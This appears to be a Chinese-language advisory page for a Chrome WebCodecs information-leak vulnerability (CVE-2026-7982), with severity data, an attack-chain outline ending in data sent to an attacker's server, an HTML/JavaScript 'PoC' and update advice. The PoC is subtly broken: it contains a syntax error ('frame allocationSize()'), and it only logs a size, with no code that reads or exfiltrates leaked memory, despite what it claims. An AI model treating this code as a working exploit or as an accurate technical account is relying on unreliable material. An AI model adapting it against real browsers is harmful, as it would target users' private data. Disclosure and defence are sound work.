CVE-2026-7982 CVSS 6.5 中危

CVE-2026-7982 Google Chrome WebCodecs信息泄露漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7982

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

Google Chrome 浏览器 WebCodecs 组件存在未初始化使用漏洞。在受影响版本中，攻击者可诱导用户点击访问特制的 HTML 页面，利用该漏洞从进程内存中读取敏感数据。此漏洞发生在 Chrome 148.0.7778.96 之前，可能导致用户隐私泄露，CVSS v3.1 评分为 6.5 分，属于中危级别。

技术细节

该漏洞的根源在于 Google Chrome 浏览器集成的 WebCodecs 组件中存在未初始化变量的使用缺陷。WebCodecs 是一个用于高效处理多媒体内容的底层 API，允许网页直接访问编解码器。在特定版本的 Chrome 中，当处理经过精心设计的媒体流或配置时，该组件未能将堆栈或堆内存完全清零。攻击者可以构造特制的 HTML 页面，利用 WebAssembly 或 JavaScript 调用 WebCodecs 接口，触发对未初始化内存区域的读取。由于内存可能残留了先前操作的数据（如其他网站的内容、加密密钥片段或指针结构），攻击者能够通过侧信道或直接读取方式获取这些信息，从而导致敏感信息泄露。此漏洞利用需要用户交互（如点击链接），降低了被大规模自动化利用的风险。

攻击链分析

STEP 1

1. 构造攻击载荷

攻击者编写包含恶意JavaScript代码的HTML页面，该代码专门针对WebCodecs组件的未初始化内存缺陷。

STEP 2

2. 投递恶意页面

攻击者通过网络钓鱼、水坑攻击或诱导链接等方式，将恶意页面发送给目标用户。

STEP 3

3. 触发漏洞利用

目标用户使用存在漏洞的Chrome浏览器访问恶意页面，并执行页面中的脚本，触发未初始化内存的读取操作。

STEP 4

4. 信息窃取

攻击者脚本解析从进程内存中读取到的数据，提取敏感信息（如内存指针、其他会话数据等）并发送回攻击者服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!DOCTYPE html>
<html>
<head><title>CVE-2026-7982 PoC</title></head>
<body>
<script>
// Proof of Concept for Uninitialized Use in WebCodecs
// This script attempts to trigger the vulnerability by configuring VideoDecoder.

function triggerLeak() {
    try {
        // Attempt to initialize a decoder with potentially malicious config
        const decoder = new VideoDecoder({
            output: (frame) => {
                console.log("Frame output:", frame);
                // Access frame data which might contain uninitialized memory
                let data = frame allocationSize();
                console.log("Potential memory leak size:", data);
                frame.close();
            },
            error: (e) => console.error("Decoder error:", e)
        });

        // Configure with a codec to trigger the specific code path
        decoder.configure({ codec: 'vp09.00.10.08' });
        
        // Feed a chunk to stimulate processing
        const chunk = new EncodedVideoChunk({
            type: 'key',
            timestamp: 0,
            data: new Uint8Array([0x00, 0x00, 0x01, 0x00]) // Minimal header
        });
        
        decoder.decode(chunk);
        
    } catch (e) {
        console.log("Exception during PoC execution:", e);
    }
}

triggerLeak();
</script>
</body>
</html>

影响范围

Google Chrome < 148.0.7778.96

防御指南

临时缓解措施

建议用户立即检查并更新Google Chrome浏览器到最新版本。在未修复前，应谨慎处理来源不明的HTML文件或网页链接，避免在浏览器中打开可疑内容以防止被利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表